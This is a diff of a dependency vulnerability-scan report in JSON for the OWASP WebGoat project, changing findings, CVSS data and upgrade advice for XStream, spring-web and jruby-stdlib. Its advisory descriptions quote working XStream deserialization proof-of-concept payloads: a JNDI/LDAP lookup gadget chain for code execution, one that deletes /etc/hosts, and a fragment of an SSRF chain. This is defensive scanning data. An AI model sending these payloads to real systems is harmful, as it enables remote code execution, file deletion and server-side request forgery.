\u003cmethod\u003e\r\n                \u003cclass\u003ejava.lang.Comparable\u003c/class\u003e\r\n                \u003cname\u003ecompareTo\u003c/name\u003e\r\n                \u003cparameter-types\u003e\r\n                  \u003cclass\u003ejava.lang.Object\u003c/class\u003e\r\n                \u003c/parameter-types\u003e\r\n              \u003c/method\u003e\r\n              \u003ccom.sun.xml.internal.ws.client.sei.StubHandler\u003e\r\n                \u003cbodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'\u003e\r\n                  \u003cindices\u003e\r\n                    \u003cint\u003e0\u003c/int\u003e\r\n                  \u003c/indices\u003e\r\n                  \u003cgetters\u003e\r\n                    \u003ccom.sun.xml.internal.ws.client.sei.ValueGetter\u003ePLAIN\u003c/com.sun.xml.internal.ws.client.sei.ValueGetter\u003e\r\n                  \u003c/getters\u003e\r\n                  \u003caccessors\u003e\r\n                    \u003ccom.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2\u003e\r\n                      \u003cval_-isJAXBElement\u003efalse\u003c/val_-isJAXBElement\u003e\r\n                      \u003cval_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'\u003e\r\n                        \u003ctype\u003eint\u003c/type\u003e\r\n                        \u003cfield\u003e\r\n                          \u003cname\u003ehash\u003c/name\u003e\r\n                          \u003cclazz\u003ejava.lang.String\u003c/clazz\u003e\r\n                        \u003c/field\u003e\r\n                      \u003c/val_-getter\u003e\r\n                      \u003cval_-isListType\u003efalse\u003c/val_-isListType\u003e\r\n                      \u003cval_-n\u003e\r\n                        \u003cnamespaceURI/\u003e\r\n                        \u003clocalPart\u003ehash\u003c/localPart\u003e\r\n                        \u003cprefix/\u003e\r\n                      \u003c/val_-n\u003e\r\n                      \u003cval_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'\u003e\r\n                        \u003ctype\u003ejava.lang.String\u003c/type\u003e\r\n                        \u003cmethod\u003e\r\n                          \u003cclass\u003ejdk.nashorn.internal.runtime.Source\u003c/class\u003e\r\n                          \u003cname\u003ereadFully\u003c/name\u003e\r\n                          \u003cparameter-types\u003e\r\n                            \u003cclass\u003ejava.net.URL\u003c/class\u003e\r\n                          \u003c/parameter-types\u003e\r\n                        \u003c/method\u003e\r\n                      \u003c/val_-setter\u003e\r\n                      \u003couter-class\u003e\r\n                        \u003cpropertySetters\u003e\r\n                          \u003centry\u003e\r\n                            \u003cstring\u003eserialPersistentFields\u003c/string\u003e\r\n                            \u003ccom.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                              \u003ctype\u003e[Ljava.io.ObjectStreamField;\u003c/type\u003e\r\n                              \u003cfield\u003e\r\n                                \u003cname\u003eserialPersistentFields\u003c/name\u003e\r\n                                \u003cclazz\u003ejava.lang.String\u003c/clazz\u003e\r\n                              \u003c/field\u003e\r\n                            \u003c/com.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                          \u003c/entry\u003e\r\n                          \u003centry\u003e\r\n                            \u003cstring\u003eCASE_INSENSITIVE_ORDER\u003c/string\u003e\r\n                            \u003ccom.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                              \u003ctype\u003ejava.util.Comparator\u003c/type\u003e\r\n                              \u003cfield\u003e\r\n                                \u003cname\u003eCASE_INSENSITIVE_ORDER\u003c/name\u003e\r\n                                \u003cclazz\u003ejava.lang.String\u003c/clazz\u003e\r\n                              \u003c/field\u003e\r\n                            \u003c/com.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                          \u003c/entry\u003e\r\n                          \u003centry\u003e\r\n                            \u003cstring\u003eserialVersionUID\u003c/string\u003e\r\n                            \u003ccom.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                              \u003ctype\u003elong\u003c/type\u003e\r\n                              \u003cfield\u003e\r\n                                \u003cname\u003eserialVersionUID\u003c/name\u003e\r\n                                \u003cclazz\u003ejava.lang.String\u003c/clazz\u003e\r\n                              \u003c/field\u003e\r\n                            \u003c/com.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                          \u003c/entry\u003e\r\n                          \u003centry\u003e\r\n                            \u003cstring\u003evalue\u003c/string\u003e\r\n                            \u003ccom.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                              \u003ctype\u003e[C\u003c/type\u003e\r\n                       ",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-web",
-                  "version": "3.1.5"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.springframework:spring-web",
-                  "version": "6.0.13"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "00000058-0000-4000-8000-000000000058",
+          "key": "00000000-0000-0000-0000-000000000038",
           "locations": [
             {
               "package": {
-                "name": "org.springframework:spring-web",
-                "version": "6.0.13"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 224
-            }
-          },
-          "title": "Open Redirect"
+          "problems": [
+            { "id": "CVE-2021-39150", "source": "cve" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.18)"],
+              "created_at": "2021-08-24T08:48:40.47485Z",
+              "credits": ["Lai Han"],
+              "cvss_base_score": 8.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:58:04.67284Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:44:28.163729Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:54.94886Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 5.3,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:57.335324Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
+              "disclosed_at": "2021-08-24T08:47:22Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.82979",
+                "probability": "0.01965"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569191",
+              "initially_fixed_in_versions": ["1.4.18"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:54.94886Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-08-24T15:09:23.138966Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-39150.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "https://x-stream.github.io/changes.html%231.4.18"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
+            },
+            { "id": "CWE-502", "source": "cwe" },
+            { "id": "GHSA-cxfm-5m4g-x7xp", "source": "ghsa" }
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 279 } },
+          "title": "Server-Side Request Forgery (SSRF)"
         },
-        "id": "00000058-0000-4000-8000-000000000058",
+        "id": "00000000-0000-0000-0000-000000000038",
         "links": {},
         "relationships": {
           "fix": {
@@ -16762,21 +6456,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "org.springframework:spring-web",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "org.springframework.boot:spring-boot-starter-web",
-                          "version": "3.1.9"
-                        },
-                        {
-                          "name": "org.springframework:spring-web",
-                          "version": "6.0.17"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.18"
                         }
                       ],
                       "is_drop": false
@@ -16785,7 +6475,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000058-0000-4000-8000-000000000058",
+              "id": "00000000-0000-0000-0000-000000000038",
               "type": "fixes"
             }
           }
@@ -16795,13 +6485,13 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n### PoC\r\n\r\n```\r\n\u003csorted-set\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003eysomap\u003c/type\u003e\r\n    \u003cvalue class='javax.swing.MultiUIDefaults' serialization='custom'\u003e\r\n      \u003cunserializable-parents/\u003e\r\n      \u003chashtable\u003e\r\n        \u003cdefault\u003e\r\n          \u003cloadFactor\u003e0.75\u003c/loadFactor\u003e\r\n          \u003cthreshold\u003e525\u003c/threshold\u003e\r\n        \u003c/default\u003e\r\n        \u003cint\u003e700\u003c/int\u003e\r\n        \u003cint\u003e0\u003c/int\u003e\r\n      \u003c/hashtable\u003e\r\n      \u003cjavax.swing.UIDefaults\u003e\r\n        \u003cdefault\u003e\r\n          \u003cdefaultLocale\u003ezh_CN\u003c/defaultLocale\u003e\r\n          \u003cresourceCache/\u003e\r\n        \u003c/default\u003e\r\n      \u003c/javax.swing.UIDefaults\u003e\r\n      \u003cjavax.swing.MultiUIDefaults\u003e\r\n        \u003cdefault\u003e\r\n          \u003ctables\u003e\r\n            \u003cjavax.swing.UIDefaults serialization='custom'\u003e\r\n              \u003cunserializable-parents/\u003e\r\n              \u003chashtable\u003e\r\n                \u003cdefault\u003e\r\n                  \u003cloadFactor\u003e0.75\u003c/loadFactor\u003e\r\n                  \u003cthreshold\u003e525\u003c/threshold\u003e\r\n                \u003c/default\u003e\r\n                \u003cint\u003e700\u003c/int\u003e\r\n                \u003cint\u003e1\u003c/int\u003e\r\n                \u003cstring\u003eggg\u003c/string\u003e\r\n                \u003cjavax.swing.UIDefaults_-ProxyLazyValue\u003e\r\n                  \u003cclassName\u003ejavax.naming.InitialContext\u003c/className\u003e\r\n                  \u003cmethodName\u003edoLookup\u003c/methodName\u003e\r\n                  \u003cargs\u003e\r\n                    \u003carg\u003eldap://localhost:1099/CallRemoteMethod\u003c/arg\u003e\r\n                  \u003c/args\u003e\r\n                \u003c/javax.swing.UIDefaults_-ProxyLazyValue\u003e\r\n              \u003c/hashtable\u003e\r\n              \u003cjavax.swing.UIDefaults\u003e\r\n                \u003cdefault\u003e\r\n                  \u003cdefaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/\u003e\r\n                  \u003cresourceCache/\u003e\r\n                \u003c/default\u003e\r\n              \u003c/javax.swing.UIDefaults\u003e\r\n            \u003c/javax.swing.UIDefaults\u003e\r\n          \u003c/tables\u003e\r\n        \u003c/default\u003e\r\n      \u003c/javax.swing.MultiUIDefaults\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003eysomap\u003c/type\u003e\r\n    \u003cvalue class='com.sun.org.apache.xpath.internal.objects.XString'\u003e\r\n      \u003cm__obj class='string'\u003etest\u003c/m__obj\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n\u003c/sorted-set\u003e\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n## References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39154.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. An attacker can manipulate the processed input stream and replace or inject objects, that result in the deletion of a file on the local host. \r\n\r\n### PoC\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'\u003e\r\n        \u003cindexMap class='com.sun.xml.internal.ws.client.ResponseContext'\u003e\r\n          \u003cpacket\u003e\r\n            \u003cmessage class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'\u003e\r\n              \u003cdataSource class='com.sun.xml.internal.ws.encoding.MIMEPartStreamingDataHandler$StreamingDataSource'\u003e\r\n                \u003cpart\u003e\r\n                  \u003cdataHead\u003e\r\n                    \u003ctail/\u003e\r\n                    \u003chead\u003e\r\n                      \u003cdata class='com.sun.xml.internal.org.jvnet.mimepull.MemoryData'\u003e\r\n                        \u003clen\u003e3\u003c/len\u003e\r\n                        \u003cdata\u003eAQID\u003c/data\u003e\r\n                      \u003c/data\u003e\r\n                    \u003c/head\u003e\r\n                  \u003c/dataHead\u003e\r\n                  \u003ccontentTransferEncoding\u003ebase64\u003c/contentTransferEncoding\u003e\r\n                  \u003cmsg\u003e\r\n                    \u003cit class='java.util.ArrayList$Itr'\u003e\r\n                      \u003ccursor\u003e0\u003c/cursor\u003e\r\n                      \u003clastRet\u003e1\u003c/lastRet\u003e\r\n                      \u003cexpectedModCount\u003e4\u003c/expectedModCount\u003e\r\n                        \u003couter-class\u003e\r\n                          \u003ccom.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/\u003e\r\n                          \u003ccom.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/\u003e\r\n                          \u003ccom.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/\u003e\r\n                          \u003ccom.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/\u003e\r\n                        \u003c/outer-class\u003e\r\n                    \u003c/it\u003e\r\n                    \u003cin class='java.io.FileInputStream'\u003e\r\n                      \u003cfd/\u003e\r\n                      \u003cchannel class='sun.nio.ch.FileChannelImpl'\u003e\r\n                        \u003ccloseLock/\u003e\r\n                        \u003copen\u003etrue\u003c/open\u003e\r\n                        \u003cthreads\u003e\r\n                          \u003cused\u003e-1\u003c/used\u003e\r\n                        \u003c/threads\u003e\r\n                        \u003cparent class='sun.plugin2.ipc.unix.DomainSocketNamedPipe'\u003e\r\n                          \u003csockClient\u003e\r\n                            \u003cfileName\u003e/etc/hosts\u003c/fileName\u003e\r\n                            \u003cunlinkFile\u003etrue\u003c/unlinkFile\u003e\r\n                          \u003c/sockClient\u003e\r\n                          \u003cconnectionSync/\u003e\r\n                        \u003c/parent\u003e\r\n                      \u003c/channel\u003e\r\n                      \u003ccloseLock/\u003e\r\n                    \u003c/in\u003e\r\n                  \u003c/msg\u003e\r\n                \u003c/part\u003e\r\n              \u003c/dataSource\u003e\r\n            \u003c/message\u003e\r\n            \u003csatellites/\u003e\r\n            \u003cinvocationProperties/\u003e\r\n          \u003c/packet\u003e\r\n        \u003c/indexMap\u003e\r\n      \u003c/comparator\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003cstring\u003ejavax.xml.ws.binding.attachments.inbound\u003c/string\u003e\r\n    \u003cstring\u003ejavax.xml.ws.binding.attachments.inbound\u003c/string\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
                   "name": "com.thoughtworks.xstream:xstream",
@@ -16812,7 +6502,7 @@
             }
           ],
           "finding_type": "sca",
-          "key": "00000059-0000-4000-8000-000000000059",
+          "key": "00000000-0000-0000-0000-000000000039",
           "locations": [
             {
               "package": {
@@ -16822,19 +6512,115 @@
               "type": "package"
             }
           ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 275
-            }
-          },
-          "title": "Arbitrary Code Execution"
+          "policy_modifications": [],
+          "problems": [
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.16)"],
+              "created_at": "2021-03-23T13:00:34.694452Z",
+              "credits": ["Liaogui Zhong"],
+              "cvss_base_score": 5.3,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 5.3,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:59:48.677017Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:16.126324Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 5.9,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:58.157857Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 5.9,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:10.785616Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N/E:P",
+              "disclosed_at": "2021-03-23T12:59:14Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.70911",
+                "probability": "0.00687"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088333",
+              "initially_fixed_in_versions": ["1.4.16"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:58.157857Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-03-23T17:13:21.536021Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-21343.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "http://x-stream.github.io/changes.html%231.4.16"
+                },
+                {
+                  "title": "XStream Workaround",
+                  "url": "https://x-stream.github.io/security.html%23workaround"
+                }
+              ],
+              "severity": "medium",
+              "source": "snyk_vuln"
+            },
+            { "id": "CWE-502", "source": "cwe" },
+            { "id": "GHSA-74cv-f58x-f9wf", "source": "ghsa" },
+            { "id": "CVE-2021-21343", "source": "cve" }
+          ],
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 142 } },
+          "title": "Deserialization of Untrusted Data"
         },
-        "id": "00000059-0000-4000-8000-000000000059",
+        "id": "00000000-0000-0000-0000-000000000039",
         "links": {},
         "relationships": {
           "fix": {
@@ -16848,11 +6634,11 @@
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
                           "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.18"
+                          "version": "1.4.16"
                         }
                       ],
                       "is_drop": false
@@ -16861,7 +6647,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000059-0000-4000-8000-000000000059",
+              "id": "00000000-0000-0000-0000-000000000039",
               "type": "fixes"
             }
           }
@@ -16871,134 +6657,275 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) when providing a specially crafted HTTP request. \r\n\r\nTo be vulnerable, these conditions must all be met (which is usually the case for applications dependent on `org.springframework.boot:spring-boot-actuator`): \r\n\r\n- The affected application uses Spring MVC or Spring WebFlux.\r\n\r\n- `io.micrometer:micrometer-core` is on the classpath.\r\n\r\n- An `ObservationRegistry` is configured in the application to record observations.\r\n\r\n## Workaround\r\n\r\nThis vulnerability can be avoided by disabling web observations: `management.metrics.enable.http.server.requests=false`\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-web` to version 6.0.14 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/c18784678df489d06a70e54fcddb5e3821d4b00c)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-34053)\n",
+          "description": "## Overview\n[org.jruby:jruby-stdlib](https://www.jruby.org/) is a JRuby Lib Setup package.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) through the `response parser` which uses `Range#to_a` to convert the `uid-set` data into arrays of integers, without limitations on the expanded size of the ranges.\n## Remediation\nA fix was pushed into the `master` branch but not yet published.\n## References\n- [GitHub Commit](https://github.com/ruby/net-imap/commit/70e3ddd071a94e450b3238570af482c296380b35)\n- [GitHub Commit](https://github.com/ruby/net-imap/commit/c8c5a643739d2669f0c9a6bb9770d0c045fd74a3)\n- [GitHub Commit](https://github.com/ruby/net-imap/commit/cb92191b1ddce2d978d01b56a0883b6ecf0b1022)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-web",
-                  "version": "3.1.5"
+                  "version": "2025.4-SNAPSHOT"
                 },
-                {
-                  "name": "org.springframework:spring-web",
-                  "version": "6.0.13"
-                }
+                { "name": "org.asciidoctor:asciidoctorj", "version": "3.0.0" },
+                { "name": "org.jruby:jruby", "version": "10.0.0.1" },
+                { "name": "org.jruby:jruby-stdlib", "version": "10.0.0.1" }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "0000005c-0000-4000-8000-00000000005c",
+          "key": "00000000-0000-0000-0000-000000000040",
           "locations": [
             {
               "package": {
-                "name": "org.springframework:spring-web",
-                "version": "6.0.13"
+                "name": "org.jruby:jruby-stdlib",
+                "version": "10.0.0.1"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 40
+          "problems": [
+            { "id": "CWE-400", "source": "cwe" },
+            { "id": "GHSA-7fc5-f82f-cx69", "source": "ghsa" },
+            { "id": "CVE-2025-25186", "source": "cve" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[10.0.0.0,]"],
+              "created_at": "2025-06-27T12:45:14.851401Z",
+              "credits": ["manunio"],
+              "cvss_base_score": 7.1,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 7.1,
+                  "cvss_version": "4.0",
+                  "modified_at": "2025-06-27T12:45:15.176507Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
+                },
+                {
+                  "assigner": "Snyk",
+                  "base_score": 6.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2025-06-27T12:45:15.176507Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 6.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2025-02-12T13:57:54.586205Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
+              "disclosed_at": "2025-02-10T16:41:18Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.51534",
+                "probability": "0.00285"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "not defined",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "not defined",
+                    "type": "primary"
+                  }
+                ],
+                "sources": []
+              },
+              "id": "SNYK-JAVA-ORGJRUBY-10557730",
+              "initially_fixed_in_versions": [],
+              "is_fixable": false,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2025-06-27T12:45:15.176507Z",
+              "package_name": "org.jruby:jruby-stdlib",
+              "package_version": "",
+              "published_at": "2025-06-27T12:45:15.167275Z",
+              "references": [
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/ruby/net-imap/commit/70e3ddd071a94e450b3238570af482c296380b35"
+                },
+                {
+                  "title": "GitHub Commit",
